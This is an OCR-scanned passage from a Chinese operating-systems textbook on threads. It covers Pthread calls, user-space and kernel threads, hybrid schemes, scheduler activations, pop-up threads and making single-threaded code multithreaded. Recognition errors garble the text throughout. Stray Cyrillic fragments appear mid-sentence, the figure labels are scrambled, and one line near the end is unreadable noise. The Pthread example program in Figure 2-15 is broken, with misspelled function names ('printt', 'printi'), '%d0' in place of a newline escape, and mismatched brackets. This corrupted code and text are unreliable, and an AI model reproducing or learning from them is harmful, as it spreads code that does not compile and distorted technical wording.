所 有 Pthread 线 程 都 有 某 些 特性 。 每 一 个 都 含有 一 个 标识 符 、 一 组 寄存 器 (包括 程序 计数 器 ) 和 一 
组 存储 在 结构 中 的 属性 。 这 些 属性 包括 堆栈 大 小 、 调 度 参数 以 及 使 用 线程 需要 的 其 他 项 目 。 


线程 调用 ж 述 
Pthread_create 创建 一 个 新 线程 
Pthread_exit 结束 调用 的 线程 
Pthread_join 等 待 一 个 特定 的 线程 退出 


Pthread_yield 


释放 CPU 来 运行 另外 一 个 线程 


Pthread_attr_init 


创建 并 初始 化 一 个 线程 的 属性 结构 


Pthread_attr_destroy 


删除 一 个 线程 的 属性 结构 


图 2-14 一 些 Pthread 的 函数 调用 


创建 一 个 新 线程 需要 使 用 pthread_create 调 用 。 新 创建 的 线程 的 线程 标识 符 作为 函数 值 返回 。 这 种 调 
用 有 意 看 起 来 很 像 fork 系 统 调用 ， 其 中 线程 标识 符 起 着 PID 的 作用 ， 而 这 么 做 的 目的 主要 是 为 了 标识 在 
其 他 调用 中 引用 的 线程 。 

当 一 个 线程 完成 分 配给 它 的 工作 时 ， 可 以 通过 调用 pthread_exit 来 终止 。 这 个 调用 终止 该 线程 并 释 
放 它 的 栈 。 

一 般 一 个 线程 在 继续 运行 前 需要 等 待 另 一 个 线程 完成 它 的 工作 并 退出 。 可 以 通过 pthread_join 线 程 
调用 来 等 待 别 的 特定 线程 的 终止 。 而 要 等 待 线程 的 线程 标识 符 作为 一 个 参数 给 出 。 

有 时 会 出 现 这 种 情况 ， 一 个 线程 逻辑 上 没有 阻塞 ， 但 感觉 上 它 已 经 运 ТОГА КОНЕН 
外 一 个 线程 机 会 去 运行 。 这 时 可 以 通过 调用 pthread_yield 完 成 这 一 目标 。 而 进程 中 没有 这 种 调用 ， 因 为 
假设 进程 间 会 有 激烈 的 竞争 性 ， 并 且 每 一 个 进程 都 希望 获得 它 所 能 得 到 的 所 有 的 CPU 时 间 。 但 是 ， 由 于 
同一 进程 中 的 线程 可 以 同时 工作 ， 并 且 它 们 的 代码 总 是 由 同一 个 程序 员 编写 的 ， 因 此 ， 有 了 时 程序 员 希 望 
它们 能 互相 给 对 方 一 些 机 会 去 运行 。 

下 面 两 个 线程 调用 是 处 理 属性 的 。 Pthread_attr_init 建 立 关联 一 个 线程 的 属性 结构 并 初始 化 成 默认 值 
这 些 值 (例如 优先 级 ) 可 以 通过 修改 属性 结构 中 的 域 值 来 改变 。 

最 后 ，pthread_attr_destroy 删 除 一 个 线程 的 属性 结构 ， 释 放 它 占用 的 内 存 。 它 不 会 影响 调用 它 的 线 
程 。 这 些 线程 会 继续 存在 。 

为 了 更 好 地 了 解 Pthread 是 如 何 工作 的 ， 考 虑 图 2-15 提 供 的 简单 例子 。 这 里 主 程序 在 宣布 它 的 意图 之 
后 ， 循 环 NUMBER_OF_THREADS 次 ， 每 次 创建 一 个 新 的 线程 。 如 果 线 程 创建 失败 ， 会 打印 出 一 条 错 
误 信息 然后 退出 。 在 创建 完 所 有 线程 之 后 ， 主 程序 退出 。 

当 创建 一 个 线程 时 ， 它 打印 一 条 一 行 的 发 布 信息 ， 然 后 退出 。 这 些 不 同 信息 交错 的 顺序 是 不 确定 的 ， 
并 且 可 能 在 连续 运行 程序 的 情况 下 发 生变 化 。 

前 面 描述 的 Pthread 调 用 无 论 如 何 也 不 是 届 指 可 数 的 这 几 个 ， 还 有 许多 的 调用 。 我 们 会 在 讨论 “ 进 
程 与 线程 同步 ”之 后 再 来 研究 其 他 一 些 Pthread 调 用 。 
224 在 用 户 空间 中 实现 线程 

有 两 种 主要 的 方法 实现 线程 包 : 在 用 户 空间 中 和 在 内 核 中 。 这 两 种 方法 互 有 利弊 ， 不 过 混合 实现 方 
式 也 是 可 能 的 。 我 们 现在 介绍 这 些 方法 ， 并 分 析 它 们 的 优点 和 缺点 。 

第 一 种 方法 是 把 整个 线程 包 放 在 用 户 空间 中 ， 内 核对 线程 包 一 无 所 知 。 从 内 核 角度 考虑 ， 就 是 按 正 
常 的 方式 管理 ， 即 单线 程 进程 。 这 种 方法 第 -- 个 ， 也 是 最 明显 的 优点 是 ， 用 户 级 线程 包 可 以 在 不 支持 线 
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程 的 操作 系统 上 实现 。 过 去 所 有 的 操作 系统 都 属于 这 个 范围 ， 即 使 现在 也 有 一 些 操作 系统 还 是 不 支持 线 
程 。 通 过 这 一 方法 ， 可 以 用 函数 库 实现 线程 。 


#include <pthread.h> 
#include <stdio.h> 
#include <stdlib.h> 


#define NUMBER_OF_THREADS 10 
void *print_hello _world(void *tid) 


{ жашан. Жн. "/ 
printt("Hello World. Greetings from thread %d0, tid); 
pthread_exit(NULL); 

) 


int main(int argc, char *argv[]) 


Г 主 程序 创建 10 个 线程 ， 然 后 退出 。 */ 
pthread_t threads[NUMBER_OF _ THREADS]; 
int status, i; 


for(i=0; і < NUMBER_OF_THREADS; i++) { 
printf("Main here. Creating thread %d0, i); 
status = pthread_create(&threads{i], NULL, print_hello_world, (void *)i); 


if (status != 0) { 
printi("Oops. pthread_create returned error code %d0, status); 
exit(-1); 


} 
} 
exit(NULL); 


图 2-15 使 用 线程 的 一 个 例子 程序 
所 有 的 这 类 实现 都 有 同样 的 通用 结构 ， 如 图 2-16a 所 示 。 线程 在 一 个 运行 时 系统 的 顶部 运行 ， 这 个 
运行 时 系统 是 一 个 管理 线程 的 过 程 的 集合 。 我 们 已 经 见 过 其 中 的 四 个 过 程 : Pthread_create, pthread_exit, 
pthread_join 和 pthread_yield。 不 过 ， 一 般 还 会 有 更 多 的 过 程 。 


进程 线程 进程 вв 
用 户 空间 OE 
4 
пиен 7 ав ЕЗ 内 核 ЕЗ 
运行 时 系统 。 线程 表 进程 表 进程 表 RER 
а) b) 


图 2-16 a) 用 户 级 线程 包 ，b) 由 内 核 管理 的 线程 包 


在 用 户 空间 管理 线程 时 ， 每 个 进程 需要 有 其 专用 的 线程 表 (thread table), 用 来 跟踪 该 进程 中 的 线 
程 。 这 些 表 和 内 核 中 的 进程 表 类 似 ， 不 过 它 仅仅 记录 各 个 线程 的 属性 ， 如 每 个 线程 的 程序 计数 器 、 堆 栈 
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指针 、 寄 存 器 和 状态 等 。 该 线程 表 由 运行 时 系统 管理 。 当 一 个 线程 转换 到 就 绪 状 态 或 阻塞 状态 时 ， 在 访 
线程 表 中 存放 重新 启动 该 线程 所 需 的 信息 ， 与 内 核 在 进程 表 中 存放 进程 的 信息 完全 一 样 。 

当 某 个 线程 做 了 引起 在 本 地 险 塞 的 事情 之 后 ， 例 如 ， 等 待 进程 中 另 一 个 线程 完成 某 项 工作 
它 吝 用 一 个 运行 时 系统 的 过 程 ， 这 个 过 程 检查 该 线程 是 否 必须 进入 阻塞 状态 。 如 果 是 ， 它 在 线程 表 中 保 
存 该 线程 的 寄存 器 ( 即 它 本 身 的 )， 查 看 表 中 可 运行 的 就 绪 线程 ， 并 把 新 线程 的 保存 值 重 新 装 人 机 器 的 寄 
存 器 中 。 只 要 堆栈 指针 和 程序 计数 器 一 被 切换 ， 新 的 线程 就 又 自动 投入 运行 。 如 果 机 器 有 一 条 保存 所 有 
寄存 器 的 指令 和 另 一 条 装 入 全 部 寄存 器 的 指令 ， 那 么 整个 线程 的 切换 可 以 在 几 条 指令 内 完成 。 进 行 类 似 
于 这 样 的 线程 切换 至 少 比 陷入 内 核 要 快 一 个 数量 级 (或许 更 多 ) ， 这 是 使 用 用 户 级 线程 包 的 极 大 的 优点 。 

不 过 ， 线 程 与 进程 有 一 个 关键 的 差别 。 在 线程 完成 运行 时 ， 例 如 ， 在 它 调用 thread_yield 时 
pthread_yield 代 码 可 以 把 该 线程 的 信息 保存 在 线程 表 中 ， 进 而 ， 它 可 以 调用 线程 调度 程序 来 选择 另 一 个 
要 运行 的 线程 。 保 存 该 线程 状态 的 过 程 和 调度 程序 都 只 是 本 地 过 程 ， 所 以 启动 它们 比 进行 内 核 调用 效率 
更 高 。 另 一 方面 ， 不 需要 陷阱 ， 不 需要 上 下 文 切换 ， 也 不 需要 对 内 存 高 速 缓存 进行 刷新 ， 这 就 使 得 线程 
调度 非常 快捷 。 

用 户 级 线程 还 有 另 一 个 优点 。 它 允许 每 个 进程 有 自己 定制 的 调度 算法 。 例 如 ， 在 某 些 应 用 程序 中 
那些 有 垃圾 收集 线程 的 应 用 程序 就 不 用 担心 线程 会 在 不 合适 的 时 刻 停止 ， 这 是 一 个 长 处 。 用 户 级 线程 还 
具有 较 好 的 可 扩展 性 ， 这 是 因为 在 内 核 空间 中 内 核 线程 需要 一 些 固定 表格 空间 和 堆栈 空间 ， 如 果 内 核 线 
程 的 数量 非常 大 ， 就 会 出 现 问题 。 

尽管 用 户 级 线程 包 有 更 好 的 性 能 ， 但 它 也 存在 一 些 明显 的 问题 。 其 中 第 一 个 问题 是 如 何 实现 阻塞 系 
统 调用 。 假 设 在 还 没有 任何 击 键 之 前 ， 一 个 线程 读 取 键盘 。 让 该 线程 实际 进行 该 系统 调用 是 不 可 接受 的 ， 
因为 这 会 停止 所 有 的 线程 。 使 用 线程 的 一 个 主要 目标 是 ， 首 先 要 允许 每 个 线程 使 用 阻塞 调用 ， 但 是 还 要 
避免 被 阻塞 的 线程 影响 其 他 的 线程 。 有 了 阻塞 系统 调用 ， 这 个 目标 不 是 轻易 地 能 够 实现 的 。 

系统 调用 可 以 全 部 改 成 非 阻塞 的 〈( 例 如， 如 果 没 有 被 缓冲 的 字符 ， 对 键盘 的 read 操 作 可 以 只 返回 0 
字 节 )， 但 是 这 需要 修改 操作 系统 ， 所 以 这 个 办 法 也 不 吸引 人 。 而 且 ， 用 户 级 线程 的 一 个 长 处 就 是 它 可 
以 在 现 有 的 操作 系统 上 运行 。 另 外 ， 改 变 read 操 作 的 语义 需要 修改 许多 用 户 程序 。 

在 这 个 过 程 中 ， 还 有 一 种 可 能 的 替代 方案 ， 就 是 如 果 某 个 调用 会 阻塞 ， 就 提前 通知 。 在 某 些 UNIX 
版 本 中 ， 有 一 个 系统 调用 select 可 以 允许 调用 者 通知 预期 的 read 是 否 会 阻塞 。 若 有 这 个 调用 ， 那 么 库 过 
程 read 就 可 以 被 新 的 操作 替代 ， 首 先进 行 select 调 用 ， 然 后 只 有 在 安全 的 情形 下 ( 即 不 会 阻塞 ) 才 进行 
read 调 用 。 如 果 read 调 用 会 被 阻塞 ， 有 关 的 调用 就 不 进行 ， 代 之 以 运行 另 一 个 线程 。 到 了 下 次 有 关 的 运 
行 系统 取得 控制 权 之 后 ， 就 可 以 再 次 检查 看 看 现在 进行 read 调 用 是 否 安全 。 这 个 处 理 方法 需要 重 写 部 分 
系统 调用 库 ， 所 以 效率 不 高 也 不 优雅 ， 不 过 没有 其 他 的 可 选 方案 了 。 在 系统 调用 周围 从 事 检查 的 这 类 代 
码 称 为 包装 器 (jacket 或 wrapper)。 

与 阻塞 系统 调用 问题 有 些 类 似 的 是 页 面 故障 问题 。 我 们 将 在 第 3 章 讨论 这 些 问题 。 此 刻 可 以 认为 ， 
把 计算 机 设置 成 这 样 一 种 工作 方式 ， 即 并 不 是 所 有 的 程序 都 一 次 性 放 在 内 存 中 。 如 果 某 个 程序 调用 或 者 
跳 转 到 了 一 条 不 在 内 存 的 指令 上 ， 就 会 发 生 页 面 故障 ， 而 操作 系统 将 到 磁盘 上 取 回 这 个 丢失 的 指令 (和 
该 指令 的 “邻居 们 ”")， 这 就 称 为 页 面 故障 。 在 对 所 需 的 指令 进行 定位 和 读 和 时， 相关 的 进程 就 被 阻塞 
如 果 有 一 个 线程 引起 页 面 故障 ， 内 核 由 于 甚至 不 知道 有 线程 存在 ， 通 常会 把 整个 进程 阻塞 直到 磁盘 1/O 
完成 为 止 ， 尽 管 其 他 的 线程 是 可 以 运行 的 。 

用 户 级 线程 包 的 另 一 个 问题 是 ， 如 果 一 个 线程 开始 运行 ， 那 么 在 该 进程 中 的 其 他 线程 就 不 能 运行 ， 
除非 第 一 个 线程 自动 放弃 CPU。 在 一 个 单独 的 进程 内 部 ， 没 有 时 钟 中 断 ， 所 以 不 可 能 用 轮转 调度 (轮流 ) 
的 方式 调度 进程 。 除 非 某 个 线程 能 够 按照 自己 的 意志 进入 运行 时 系统 ， 否 则 调度 程序 就 没有 任何 机 会 。 

对 线程 永久 运行 问题 的 一 个 可 能 的 解决 方案 是 让 运行 时 系统 请 求 每 秒 一 次 的 时 钟 信号 (中断 ) {п 
是 这 样 对 程序 也 是 生硬 和 无 序 的 。 不 可 能 总 是 高 频率 地 发 生 周 期 性 的 时 钟 中 断 ， 即 使 可 能 ， 总 的 开销 也 
是 可 观 的 。 而 且 ， 线 程 可 能 也 需要 时 钟 中 断 ， 这 就 会 扰乱 运行 时 系统 使 用 的 时 钟 。 

再 者 ， 也 许 反对 用 户 级 线程 的 最 大 负面 争论 意见 是 ， 程 序 员 通常 在 经 常 发 生 线程 阻塞 的 应 用 中 才 希 
望 使 用 多 个 线程 。 例 如 ， 在 多 线程 Web 服 务 器 里 。 这 些 线程 持续 地 进行 系统 调用 ， 而 一 旦 发 生 内 核 陷阱 
进行 系统 调用 ， 如 果 原 有 的 线程 已 经 阻塞 ， 就 很 难 让 内 核 进行 线程 的 切换 ， 如 果 要 让 内 核 消除 这 种 情形 ， 
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就 要 持续 进行 select 系 统 调用 ， 以 便 检 查 read 系 统 调用 是 否 安全 。 对 于 那些 基本 上 是 CPU 密集 型 而 且 极 
少 有 阻塞 的 应 用 程序 而 言 ， 使 用 多 线程 的 目的 又 何在 呢 ? 由 于 这 样 的 做 法 并 不 能 得 到 任何 益处 ， 所 以 没 
有 人 会 真正 提出 使 用 多 线程 来 计算 前 "个 素数 或 者 下 象棋 等 一 类 工作 。 


2.2.5 在 内 核 中 实现 线程 

现在 我 们 研究 内 核 了 解 和 管理 线程 的 情形 。 如 图 2-16b 所 示 ， 此 时 不 再 需要 运行 时 系统 了 。 另 外 ， 
每 个 进程 中 也 没有 线程 表 。 相 反 ， 在 内 核 中 有 用 来 记录 系统 中 所 有 线程 的 线程 表 。 当 某 个 线程 希望 创建 
一 个 新 线程 或 撤销 一 个 已 有 线程 时 ， 它 进行 一 个 系统 调用 ， 这 个 系统 调用 通过 对 线程 表 的 更 新 完成 线程 
创建 或 撤销 工作 。 

内 核 的 线程 表 保存 了 每 个 线程 的 寄存 器 、 状 态 和 其 他 信息 。 这 些 信息 和 在 用 户 空间 中 (在 运行 时 系 
统 中 ) 的 线程 是 一 样 的 ， 但 是 现在 保存 在 内 核 中 。 这 些 信息 是 传统 内 核 所 维护 的 每 个 单线 程 进 程 信息 
( 即 进程 状态 ) 的 子 集 。 另 外 ， 内 核 还 维护 了 传统 的 进程 表 ， 以 便 跟踪 进程 的 状态 。 

所 有 能 够 阻塞 线程 的 调用 都 以 系统 调用 的 形式 实现 , 这 与 运行 时 系统 过 程 相 比 , 代价 是 相当 可 观 的 。 
当 一 个 线程 阻塞 时 ， 内 核 根 据 其 选择 ， 可 以 运行 同一 个 进程 中 的 另 一 个 线程 ( 若 有 一 个 就 绪 线程 ) 或 者 
运行 另 一 个 进程 中 的 线程 。 而 在 用 户 级 线程 中 ， 运 行 时 系统 始终 运行 自己 进程 中 的 线程 ， 直 到 内 核 剥 夺 
它 的 CPU (或 者 没有 可 运行 的 线程 存在 了 ) 为 止 。 

由 于 在 内 核 中 创建 或 撤销 线程 的 代价 比较 大 ， 某 些 系统 采取 “环保 ”的 处 理 方式 ， 同 收 其 线程 。 当 
某 个 线程 被 撤销 时 ， 就 把 它 标 志 为 不 可 运行 的 ， 但 是 其 内 核 数据 结构 没有 受到 影响 。 稍 后 ， 在 必须 创建 
一 个 新 线程 时 ， 就 重新 启动 某 个 旧 线程 ， 从 而 节省 了 一 些 开销 。 在 用 户 级 线程 中 线程 回收 也 是 可 能 的 ， 
但 是 由 于 其 线程 管理 的 代价 很 小 ， 所 以 没有 必要 进行 这 项 工作 。 

内 核 线程 不 需要 任何 新 的 、 非 阻塞 系统 调用 。 另 外 ， 如 果 某 个 进程 中 的 线程 引起 了 页 面 故 障 ， 内 核 
可 以 很 方便 地 检查 该 进程 是 否 有 任何 其 他 可 运行 的 线程 ， 如 果 有 ， 在 等 待 所 需要 的 页 面 从 磁盘 读 人 时 ， 
就 选择 一 个 可 运行 的 线程 运行 。 这 样 做 的 主要 缺点 是 系统 调用 的 代价 比较 大 ， 所 以 如 果 线 程 的 操作 (O 
建 、 终 止 等 ) 比较 多 ， 就 会 带 来 很 大 的 开销 。 

虽然 使 用 内 核 线程 可 以 解决 很 多 问题 ， 但 是 不 会 解决 所 有 的 问题 。 例 如 ， 当 一 个 多 线程 进程 创建 新 
的 进程 时 ， 会 发 生 什么 ? 新 进程 是 拥有 与 原 进程 相同 数量 的 线程 ， 还 是 只 有 一 个 线程 ? 在 很 多 情况 下 ， 
最 好 的 选择 取决 于 进程 计划 下 一 步 做 什么 。 如果 它 要 调用 exec 来 启动 一 个 新 的 程序 ， 或 许 一 个 线程 是 正 
确 的 选择 ， 但 是 如 果 它 继续 执行 ， 则 应 该 复制 所 有 的 线程 。 

另 一 个 话题 是 信号 。 回 忆 一 下 ， 信 号 是 发 给 进程 而 不 是 线程 的 ， 至 少 在 经 典 模型 中 是 这 样 的 。 当 一 
个 信号 到 达 时 ， 应 该 由 哪 一 个 线程 处 理 它 ?线程 可 以 “注册 ”它们 感 兴趣 的 某 些 信 号 ， 因 此 当 一 个 信号 
到 达 的 时 候 ， 可 把 它 交 给 需要 它 的 线程 。 但 是 如 果 两 个 或 更 多 的 线程 注册 了 相同 的 信号 ， 会 发 生 什么 ? 
这 只 是 线程 引起 的 问题 中 的 两 个 ， 但 是 还 有 更 多 的 问题 。 


2.2.6 混合 实现 
人 们 已 经 研究 了 各 种 试图 将 用 户 级 线程 的 优点 和 内 核 级 线程 的 优点 结合 起 来 的 方法 。 一 种 方法 是 使 
用 内 核 级 线程 ， 然 后 将 用 户 级 线程 与 某 些 或 者 全 部 多 用 户 线程 对 应 一 个 内 核 线程 


内 核 线程 多 路 复 用 起 来 ， 如 图 2-17 所 示 。 如 果 采 用 


这 种 方法 ， 编 程 人 员 可 以 决定 有 多 少 个 内 核 级 线程 

和 多 少 个 用 户 级 线程 彼此 多 路 复 用 。 这 一 模型 带 来 

最 大 的 灵活 度 。 ЖА 
采用 这 种 方法 ， 内 核 只 识别 内 核 级 线程 ， 并 对 БА 

其 进行 调度 。 其 中 一 些 内 核 级 线程 会 被 多 个 用 户 级 

线程 多 路 复 用 。 如 同 在 没有 多 线程 能 力 操作 系统 中 Ав 

= 内 核 — 内 核 线程 
其 个 进程 中 的 用 户 级 线程 一 样 ， 可 以 创建 、 撤 销 和 空间 


调度 这 些 用 户 级 线程 。 在 这 种 模型 中 ， 每 个 内 核 级 图 2-17 用 户 级 线程 与 内 核 线程 多 路 复 用 
线程 有 一 个 可 以 轮流 使 用 的 用 户 级 线程 集合 。 
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227 调度 程序 激活 机 制 

尽管 内 核 级 线程 在 一 些 关键 点 上 优 于 用 户 级 线程 ， 但 无 可 争议 的 是 内 核 级 线程 的 速度 慢 。 因 此 ， 研 
究 人 员 一 直 在 寻找 在 保持 其 优良 特性 的 前 提 下 改进 其 速度 的 方法 。 下 面 我 们 将 介绍 Anderson 等 人 (1992) 
设计 的 这 样 一 种 方法 ， 称 为 调度 程序 灌 活 (scheduler activation) 机 制 。Edler 等 人 (1988) 以 及 Scott 等 
人 (1990) 就 相关 的 工作 进行 了 深入 讨论 。 

调度 程序 激活 工作 的 目标 是 模拟 内 核 线程 的 功能 ， 但 是 为 线程 包 提供 通常 在 用 户 空间 中 才能 实现 的 
更 好 的 性 能 和 更 大 的 灵活 性 。 特 别 地 ， 如 果 用 户 线程 从 事 某 种 系统 调用 时 是 安全 的 ， 那 就 不 应 该 进 行 专 
门 的 非 阻塞 调用 或 者 进行 提前 检查 。 无 论 如 何 ， 如 果 线程 阻塞 在 某 个 系统 调用 或 页 面 故障 上 ， 只 要 在 同 
一 个 进程 中 有 任何 就 绪 的 线程 ， 就 应 该 有 可 能 运行 其 他 的 线程 。 

由 于 避免 了 在 用 户 空间 和 内 核 空间 之 间 的 不 必要 转换 ， 从 而 提高 了 效率 。 例 如 ， 如 果 某 个 线程 由 于 
等 待 另 一 个 线程 的 工作 而 阻塞 ， 此 时 没有 理由 请 求 内 核 ， 这 样 就 碱 少 了 内 核 -用 户 转换 的 开销 。 用 户 空 
间 的 运行 时 系统 可 以 阻塞 同步 的 线程 而 另外 调度 一 个 新 线程 。 

当 使 用 调度 程序 激活 机 制 时 ， 内 核 给 每 个 进程 安排 一 定数 量 的 虚拟 处 理 器 ， 并 且 让 (用 户 空间 ) 运 
行 时 系统 将 线程 分 配 到 处 理 器 上 。 这 一 机 制 也 可 以 用 在 多 处 理 器 中 ， 此 时 虚拟 处 理 器 可 能 成 为 真实 的 
CPU。 分 配给 一 个 进程 的 虚拟 处 理 器 的 初始 数量 是 一 个 ， 但 是 该 进程 可 以 申请 更 多 的 处 理 器 并 且 在 不 用 
时 退回 。 内 核 也 可 以 取 回 已 经 分 配 出 去 的 虚拟 处 理 器 ， 以 便 把 它们 分 给 需要 更 多 处 理 器 的 进程 。 

使 该 机 制 工作 的 基本 思路 是 ， 当 内 核 了 解 到 一 个 线程 被 阻塞 之 后 《例如 ， 由 于 执行 了 -个 阻塞 系统 
调用 或 者 产生 了 一 个 页 面 故 障 ) ， 内 核 通知 该 进 程 的 运行 时 系统 ， 并 且 在 堆栈 中 以 参数 形式 传递 有 问题 
的 线程 编号 和 所 发 生 事件 的 一 个 描述 。 内 核 通过 在 一 个 已 知 的 起 始 地 址 启动 运行 时 系统 ， 从 而 发 出 了 通 
知 ， 这 是 对 UNIX 中 信号 的 一 种 粗略 模拟 。 这 个 机 制 称 为 上 行 调用 (upcall), 

一 旦 如 此 激活 ， 运 行 时 系统 就 重新 调度 其 线程 ， 这 个 过 程 通 常 是 这 样 的 ， 把 当前 线程 标记 为 阻塞 并 
从 就 结 表 中 取出 另 一 个 线程 ， 设 置 其 寄存 器 ， 然 后 再 启动 之 。 稍 后 ， 当 内 核 知道 原来 的 线程 又 可 运行 时 
(例如 ， 原 先 试图 读 取 的 管道 中 有 了 数据 ， 或 者 已 经 从 磁盘 中 读 人 了 故障 的 页 面 )， 内 核 就 又 一 次 上 行 调 
用 运行 时 系统 ， 通 知 它 这 一 事件 。 此 时 该 运行 时 系统 按照 自己 的 判断 ， 或 者 立即 重启 动 被 阻塞 的 线程 
或 者 把 它 放 入 就 绪 表 中 稍 后 运行 。 

在 某 个 用 户 线程 运行 的 同时 发 生 一 个 硬件 中 断 时 ， 被 中 断 的 CPU 切换 进 核心 态 。 如 果 被 中 断 的 进程 
对 引起 该 中 断 的 事件 不 感 兴趣 ， 比 如 ， 是 另 一 个 进程 的 UO 完 成 了 ， 那 么 在 中 断 处 理 程序 结束 之 后 ， 就 
把 被 中 断 的 线程 恢复 到 中 断 之 前 的 状态 。 不 过 ， 如 果 该 进程 对 中 断 感 兴 趣 ， 比 如 ， 是 该 进程 中 的 某 个 线 
程 所 需要 的 页 面 到 达 了 ， 那 么 被 中 上 断 的 线程 就 不 再 启动 ， 代 之 为 挂 起 被 中 断 的 线程 。 而 运行 时 系统 则 启 
动 对 应 的 虚拟 CPU， 此 时 披 中 断 线程 的 状态 保存 在 堆栈 中 。 随 后， 运行 时 系统 决定 在 该 CPU 上 调度 哪个 
线程 :被 中 断 的 线程 、 新 就 绪 的 线程 还 是 菜 个 第 三 种 选择 。 

调度 程序 激活 机 制 的 一 个 目标 是 作为 上 行 调用 的 信赖 基础 ， 这 是 一 种 违反 分 层次 系统 内 在 结构 的 骤 
念 。 通 常 ，n 层 提供 ”+ 1 层 可 调用 的 特定 服务 ， 但 是 n 屋 不 能 调用 n + 1 肢 中 的 过 程 。 上 行 调用 并 不 遵守 
这 个 基本 原理 。 


2.2.8 弹出 式 线程 

在 分 布 式 系统 中 经 常 使 用 线程 。 一 个 有 意义 的 例子 是 如 何 处 理 到 来 的 消息 ， 例 如 服务 请 求 。 传 统 的 
方法 是 将 进程 或 线程 阻塞 在 一 个 receive 系 统 调用 上 ， 等 待 消息 到 来 。 当 消息 到 达 时 ， 该 系统 调用 接收 
消息 ， 并 打开 消息 检查 其 内 容 ， 然 后 进行 处 理 。 

不 过 ， 也 可 能 有 另 一 种 完全 不 同 的 处 理 方式 ， 在 该 处 理 方式 中 ， 一 个 消息 的 到 过 导致 系统 创建 一 个 
处 理 该 消息 的 线程 ， 这 种 线程 称 为 弹出 式 线程， 如 图 2-18 所 示 。 弹 出 式 线程 的 关键 好 处 是 ， 由 于 这 种 线 
程 相当 新 ， 没 有 历史 一 没有 必须 存储 的 寄存 器 、 堆 栈 诸 如 此 类 的 内 容 ， 每 个 线程 从 全 新 开始 ， 乱 一 个 
线程 彼此 之 间 都 完全 一 样 。 这 样 ， 就 有 可 能 快速 创建 这 类 线程 。 对 该 新 线程 指定 所 要 处 理 的 消息 。 使 用 
弹出 式 线程 的 结果 是 ， 消 息 到 达 与 处 理 开始 之 间 的 时 间 非 常 短 。 
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图 2-18 在 消息 到 达 时 创建 一 个 新 的 线程 : a) 消息 到 达 之 前 ，b) 消息 到 达 之 后 


在 使 用 弹出 式 线程 之 前 ,需要 提前 进行 计划 。 例 如 ， 哪 个 进程 中 的 线程 先 运行 ? 如 果 系统 支持 在 内 
核 上 下 文中 运行 线程 ， 线 程 就 有 可 能 在 那里 运行 (这 是 图 2-18 中 没有 画 出 内 核 的 原因 ) 。 在 内 核 空间 中 
运行 弹出 式 线程 通常 比 在 用 户 空间 中 容易 且 快 捷 ， 而 且 内 核 空间 中 的 弹出 式 线程 可 以 很 容易 访问 所 有 的 
表格 和 LO 设备 ， 这 些 也 许 在 中 断 处 理 时 有 用 。 而 另 一 方面 ， 出 错 的 内 核 线程 会 比 出 错 的 用 户 线程 造成 
更 大 的 损害 。 例 如 ， 如 果 某 个 线程 运行 时 间 太 长 ， 又 没有 办 法 抢占 它 ， 就 可 能 造成 进来 的 信息 丢失 。 


2.2.9 使 单线 程 代码 多 线程 化 

许多 已 有 的 程序 是 为 单线 程 进程 编写 的 。 把 这 些 程序 改写 成 多 线程 需要 比 直接 写 多 线程 程序 更 高 的 
技巧 。 下 面 我 们 考察 一 些 其 中 易 犯 的 错误 。 

先 考察 代码 ， 一 个 线程 的 代码 就 像 进程 一 样 ， 通 常 包 含 多 个 过 程 ， 会 有 局 部 变量 、 全 局 变量 和 过 程 
参数 。 局 部 变量 和 参数 不 会 引起 任何 问题 ， 但 是 有 一 个 问题 是 ， 对 线程 而 言 是 全 局 变量 ， 并 不 是 对 整个 
程序 也 是 全 局 的 。 有 许多 变量 之 所 以 是 全 局 的 ， 是 因为 线程 中 的 许多 过 程 都 使 用 它们 (如 同 它们 也 可 能 
使 用 任何 全 局 变量 一 样 )、 但 是 其 他 线程 在 逻辑 上 和 这 些 变 量 无 关 。 

作为 一 个 例子 ， 考 虑 由 UNIX 维 护 的 ermo 变 量 。 当 进程 (或 线程 ) 进行 系统 调用 失败 时 ， 错 误 码 会 
放 入 errno。 在 图 2-19 中 ， 线 程 1 执 行 系统 调用 access 以 确定 是 否 允 许 它 访问 某 个 特定 文件 。 操 作 系统 把 
返回 值 放 到 全 局 变量 errno 里 。 当 控制 权 返 回 到 线程 1 之 后 ， 并 在 线程 1 读 取 errno 之 前 ， 调 度 程序 确认 线 
程 1 此 刻 已 用 完 CPU 时 间 ， 并 决定 切换 到 线程 2。 线 程 2 执行 一 个 open 调 用 ， 结 果 失 败 ， 导 致 重 写 errno， 
于 是 给 线程 1 的 返回 值 会 永远 丢失 。 随 后 在 线程 1 执行 时 ， 它 将 读 取 错误 的 返回 值 并 导致 错误 操作 。 

对 于 这 个 问题 有 各 种 解决 方案 。 一 种 解决 方案 是 全 面 禁 止 全 局 变量 。 不 过 这 个 想法 不 一 定 合适 ， 因 
为 它 同 许多 已 有 的 软件 冲突 。 另 一 种 解决 方案 是 为 每 个 线程 赋予 其 私有 的 全 局 变量 ， 如 图 2-20 所 示 。 在 
这 个 方案 中 ， 每 个 线程 有 自己 的 errno 以 及 其 他 全 局 变量 的 私有 副本 ， 这 样 就 避免 了 冲突 。 在 效果 上 ， 这 


线程 1 线程 2 线程 1 的 代码 


线程 2 的 代码 

线程 1 的 堆栈 ~] 
打开 (ermmo 重 写 ) 线程 2 的 堆栈 

БИЕН 线程 1 的 全 局 变量 


检查 到 的 ermo 线程 2 的 全 局 变量 


存 取 (ermo 设 置 ) 


一 时 间 


图 2-19 线程 使 用 全 局 变量 所 引起 的 错误 图 2-20 线程 可 拥有 私有 的 全 局 变量 
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个 方案 创建 了 新 的 作用 域 层 ， 这 些 变量 对 一 个 线程 中 所 有 过 程 都 是 可 见 的 。 而 在 原先 的 作用 域 层 里 ， 变 
量 只 对 一 个 过 程 可 见 ， 并 在 程序 中 处 处 可 见 。 

访问 私有 的 全 局 变量 需要 有 些 技巧 , 不 过 ， 多 数 程序 设计 语言 具有 表示 局 部 变量 和 全 局 变量 的 方式 ， 
而 没有 中 间 的 形式 。 有 可 能 为 全 局 变量 分 配 一 块 内 存 ， 并 将 它 转送 给 线程 中 的 每 个 过 程 作 为 额外 的 参数 。 
尽管 这 不 是 一 个 漂亮 的 方案 ,但 却 是 一 个 可 用 的 方案 。 

还 有 另 一 种 方案 ， 可 以 引入 新 的 库 过 程 ， 以 便 创 建 、 设置 和 读 取 这 些 线程 范围 的 全 局 变量 。 首 先 一 
个 调用 也 许 是 这 样 的 : 

create_global("bufptr"); 

TAA ZEHE E RTE ETTA VAER ERIN (R E HEK ЕВЕ EE -个 名 为 bufptr 的 指针 分 配 存储 空间 。 无 论 
